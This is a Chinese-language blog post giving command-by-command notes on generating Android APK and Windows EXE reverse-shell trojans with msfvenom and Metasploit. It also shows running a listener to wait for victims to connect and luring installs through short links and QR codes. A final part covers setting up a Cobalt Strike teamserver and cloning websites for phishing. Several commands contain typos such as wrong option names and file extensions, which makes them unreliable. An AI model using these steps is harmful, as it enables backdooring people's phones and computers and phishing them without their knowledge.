0x04MSF恶意程序利用+CS上线

子怡 发布于 2023-06-21 112 次阅读


AI 摘要

0x04MSF恶意程序利用+CS上线 手机恶意程序分析指出,恶意应用程序通常会通过诱骗用户安装的方式植入手机中,同时又具备一定合法功能。其中,一些常见的欺骗手段包括生成短网址和二维码。该程序还介绍了MSF恶意程序利用的方法,通过建立APK木马文件和设置攻击载荷等步骤,实现对Android后门程序的攻击。除此之外,文章还提及了Windows后门程序攻击的过程,以及Cobalt Strike客户端和服务器端的操作方法,包括生成克隆钓鱼网站和进行后渗透的步骤。总体来看,APK是Android系统应用软件的安装包,用于传播和安装移动应用及中间件。

MSF恶意程序利用+CS上线

手机恶意应用程序分析

手机恶意程序

  • 一般是指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序

主要诱骗安装手段

  • 生成短网址
  • 生成二维码

MSF恶意程序利用

Android后门程序攻击

  • 打开Metasploit

    • msfconsole
  • 建立APK木马文件

    • msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxl port=5555 R > /home/kali/muma.app
  • 打开监听程序

    • use exploit/multi/handler
  • 设置攻击载荷

    • set payload android/meterpreter/reverse_tcp
  • 设置攻击方IP

    • set lhost 192.168.xx.xx
  • 设置监听端口

    • set lport 5555
  • 开始攻击

    • run
  • 等待受害者上线

  • 想知道有哪些指令

    • help

Windows后门程序攻击

  • msfvenom

    • 是一个Metasploit独立的有效负载生成器,也是msfpayload和
      msfencode的替代品。是用来生成后门的软件
  • 建立EXE木马文件

    • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xx.xxl port=6060 -f exe R >home/kali/mama.exe
  • 打开监听程序

    • use exploit/multi/handler
  • 设置攻击载荷

    • set payload windows/meterpreter/reverse_tcp
  • 设置攻击方IP

    • set lhost 192.168.xx.xx
  • 设置监听端口

    • set lport 6060
  • 开始攻击

    • run
  • 等待受害者上线

Cobalt Strike

客户端

服务器端

解压文件

  • unzip cobalt_strike_4.5

进入文件夹

  • cd

将所有文件设置为最高权限

  • chmod 777 *

打开服务器端

  • ./teamsever.sh 192.168.xx.xx password

运行运行客户端

  • ./cobaltstrike

生成克隆钓鱼网站

  • 1、新建监听器
  • 2、网站克隆

    • 输入克隆URL
    • 输入本地URL(本地或服务器域名)

生成木马进行后渗透

APK是AndroidPackage的缩写,即Android系统的应用软件安装包(apk),用于分发和安装移动应用及中间件。

此作者没有提供个人介绍
最后更新于 2024-03-30